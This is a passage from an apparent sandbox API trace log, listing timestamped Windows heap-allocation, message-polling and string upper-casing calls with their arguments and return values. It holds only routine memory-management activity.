0xd [0261.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0261.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0261.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0261.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0261.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0261.398] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0261.398] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0261.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0261.399] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0261.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0261.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d20 [0261.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0261.399] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0261.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0261.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0261.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0261.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0261.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0261.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0261.399] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0261.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0261.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0261.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0261.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0261.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0261.400] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0261.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0261.400] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0261.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0261.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0261.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0261.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0261.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0261.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0261.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0261.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0261.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0261.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0261.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0261.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0261.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0261.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0261.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0261.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0261.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0261.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0261.402] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0261.402] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0261.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0261.402] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0261.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0261.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d20 [0261.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0261.402] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0261.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0261.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0261.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0261.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0261.403] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0261.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0261.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0261.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0261.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0261.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0261.403] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0261.403] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0261.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0261.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0261.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0261.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0261.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0261.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0261.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0261.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0261.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0261.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0261.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0261.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.404] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0261.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0261.404] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.405] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0261.405] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0261.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0261.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0261.405] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0261.405] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0261.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0261.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0261.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0261.406] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0261.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa158 [0261.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0261.406] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0261.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0261.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0261.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0261.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0261.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0261.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20b0 [0261.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0261.407] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0261.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0261.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0261.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0261.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0261.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0261.407] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0261.407] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0261.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0261.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0261.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0261.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0261.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0261.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0261.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0261.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0261.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0261.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0261.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0261.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0261.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0261.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0261.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0261.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0261.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0261.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0261.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0261.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0261.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0261.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0261.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0261.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0261.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0261.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0261.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0261.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0261.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0261.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0261.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0261.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) 